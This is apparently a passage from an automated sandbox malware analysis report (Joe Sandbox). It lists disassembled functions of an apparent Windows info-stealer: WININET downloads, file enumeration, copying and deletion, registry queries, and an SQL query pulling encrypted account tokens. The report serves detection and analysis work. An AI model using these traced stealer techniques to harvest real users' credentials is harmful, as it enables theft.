                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D163AE
                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02D163F6
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02D1641A
                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 02D16443
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D16471
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 02D164B0
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D164BA
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D164C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 4287319946-0
                                                                                    • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                                                    • Instruction ID: 604281b03fa77612d12e83c8daee0d8326a7ee2c632cb942875a99c5eedbd4c1
                                                                                    • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                                                    • Instruction Fuzzy Hash: A5514EB5A40218BBDB20DFA0DC45BEE7779EB44705F408098F605A72C0DB74AE89CFA5
                                                                                    Function 02D24FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D24FEE
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D25017
                                                                                    • lstrcat.KERNEL32(?,00421000), ref: 02D25034
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24B93
                                                                                      • Part of subcall function 02D24B77: FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
                                                                                    • memset.MSVCRT ref: 02D2507A
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D250A3
                                                                                    • lstrcat.KERNEL32(?,00421020), ref: 02D250C0
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
                                                                                      • Part of subcall function 02D24B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
                                                                                      • Part of subcall function 02D24B77: FindClose.KERNEL32(000000FF), ref: 02D24DF9
                                                                                    • memset.MSVCRT ref: 02D25106
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2512F
                                                                                    • lstrcat.KERNEL32(?,00421038), ref: 02D2514C
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24C17
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02D24C2C
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24C49
                                                                                      • Part of subcall function 02D24B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02D24C85
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,0064A524), ref: 02D24CB1
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,00420FF8), ref: 02D24CC3
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,?), ref: 02D24CD7
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,00420FFC), ref: 02D24CE9
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,?), ref: 02D24CFD
                                                                                      • Part of subcall function 02D24B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02D24D13
                                                                                      • Part of subcall function 02D24B77: DeleteFileA.KERNEL32(?), ref: 02D24D98
                                                                                    • memset.MSVCRT ref: 02D25192
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 4017274736-0
                                                                                    • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                    • Instruction ID: b63f88cff0e5c97a1a01a99cc0b24a248f58e8e70ace1783f5c64ddc9242094a
                                                                                    • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                    • Instruction Fuzzy Hash: 89419779A40228A7DB14F7B0EC46FD97739EF34705F404454A689A61C0EEB59BCC8FA2
                                                                                    Function 02D28367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02D28397
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D2839E
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02D283BF
                                                                                    • __aulldiv.LIBCMT ref: 02D283D9
                                                                                    • __aulldiv.LIBCMT ref: 02D283E7
                                                                                    • wsprintfA.USER32 ref: 02D28413
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: @
                                                                                    • API String ID: 2774356765-2766056989
                                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction ID: 1bcafc5f4cc4fd5410844049601fcfc21f5af0bd489fd17efd52bc5234f2de8e
                                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction Fuzzy Hash: 5D214DB1E44218ABDB00DFD4CC49FAEB7B9FB44B14F104519F605BB280C7786905CBA5
                                                                                    Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                    • API String ID: 1440504306-1079375795
                                                                                    • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                                                    • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                                                    Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess$DefaultLangUser
                                                                                    • String ID: B
                                                                                    • API String ID: 1494266314-2248957098
                                                                                    • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                    • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                                                    • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                    • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                                                    Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                                                    • memset.MSVCRT ref: 00409EE8
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                                    • API String ID: 1977917189-1096346117
                                                                                    • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                                                    • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                                                    Function 02D17837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D17537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02D175A1
                                                                                      • Part of subcall function 02D17537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02D17618
                                                                                      • Part of subcall function 02D17537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02D17674
                                                                                      • Part of subcall function 02D17537: GetProcessHeap.KERNEL32(00000000,?), ref: 02D176B9
                                                                                      • Part of subcall function 02D17537: HeapFree.KERNEL32(00000000), ref: 02D176C0
                                                                                    • lstrcat.KERNEL32(0064A668,004217FC), ref: 02D1786D
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D178AF
                                                                                    • lstrcat.KERNEL32(0064A668,00421800), ref: 02D178C1
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D178F6
                                                                                    • lstrcat.KERNEL32(0064A668,00421804), ref: 02D17907
                                                                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 02D1793A
                                                                                    • lstrcat.KERNEL32(0064A668,00421808), ref: 02D17954
                                                                                    • task.LIBCPMTD ref: 02D17962
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                                                    • String ID:
                                                                                    • API String ID: 2677904052-0
                                                                                    • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                    • Instruction ID: 3ec22e76d18f7d10df769e4296df3aac73ee512102b9db40de6e5c08c6c228e3
                                                                                    • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                                                    • Instruction Fuzzy Hash: 45312A79A40109BBEB04FBE0EC94DFEB77AEB59301F145118E142A77A0DA34AD46CB61
                                                                                    Function 02D15217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02D15231
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D15238
                                                                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02D15251
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02D15278
                                                                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 02D152A8
                                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 02D152F1
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D15320
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D1532D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1008454911-0
                                                                                    • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                    • Instruction ID: 38f9d1a4bf3ee6ab9f306cbdc4ec4565efc5cb8bbdf393e59bb8e952427d4caf
                                                                                    • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                                                    • Instruction Fuzzy Hash: A93119B4A40218EBDB20CF94DC84BDCB7B5EB48704F5081D9E609A7280D7746EC5CF58
                                                                                    Function 02D25777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 02D258AB
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02D25908
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02D25ABE
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D25457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 02D2548F
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D25527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D2557F
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D25596
                                                                                      • Part of subcall function 02D25527: StrStrA.SHLWAPI(00000000,00000000), ref: 02D255CB
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D255EA
                                                                                      • Part of subcall function 02D25527: strtok.MSVCRT(00000000,?), ref: 02D25605
                                                                                      • Part of subcall function 02D25527: lstrlen.KERNEL32(00000000), ref: 02D25615
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 02D259F2
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02D25BA7
                                                                                    • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02D25C73
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D25C82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                    • String ID:
                                                                                    • API String ID: 3630751533-0
                                                                                    • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                                                    • Instruction ID: 92cdca6e2cb7ade0431f4e2f2dc05cb00790b4cc799cf2956f47d1eb68e79049
                                                                                    • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                                                    • Instruction Fuzzy Hash: 8BE12171910224EACB18FBA0ED95EED737AEF75704F808168A50666690EF345F4CCFA1
                                                                                    Function 02D11577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D1158E
                                                                                      • Part of subcall function 02D11507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D1151B
                                                                                      • Part of subcall function 02D11507: RtlAllocateHeap.NTDLL(00000000), ref: 02D11522
                                                                                      • Part of subcall function 02D11507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02D1153E
                                                                                      • Part of subcall function 02D11507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02D1155C
                                                                                      • Part of subcall function 02D11507: RegCloseKey.ADVAPI32(?), ref: 02D11566
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D115B6
                                                                                    • lstrlen.KERNEL32(?), ref: 02D115C3
                                                                                    • lstrcat.KERNEL32(?,004262EC), ref: 02D115DE
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02D116CC
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D11756
                                                                                    • memset.MSVCRT ref: 02D1177D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3885987321-0
                                                                                    • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                    • Instruction ID: 849a43d62539cd60e469288f848f69685a387c7d811920156033ca557f322133
                                                                                    • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                                                    • Instruction Fuzzy Hash: 96514FB5940229ABCB15FB60DD91EED737AEF64704F4041E8A60A62180EE305F89CFA5
                                                                                    Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02E342B0,?,0042110C,?,00000000,?), ref: 0041696C
                                                                                    • sscanf.NTDLL ref: 00416999
                                                                                    • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02E342B0,?,0042110C), ref: 004169B2
                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02E342B0,?,0042110C), ref: 004169C0
                                                                                    • ExitProcess.KERNEL32 ref: 004169DA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Time$System$File$ExitProcesssscanf
                                                                                    • String ID: B
                                                                                    • API String ID: 2533653975-2248957098
                                                                                    • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                    • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                                                    • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                                                    • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                                                    Function 02D14A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ??2@$CrackInternetlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1683549937-4251816714
                                                                                    • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                    • Instruction ID: 32ce14bce6c85d0d5ca6b10f13f6d7b64ab97cfc612c8f9dd119bbcf50c64065
                                                                                    • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                    • Instruction Fuzzy Hash: 11213BB5D00219ABDF14DFA4E849AED7B75FF44321F108225E925A7290EB706A09CF91
                                                                                    Function 02D278F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2790B
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27912
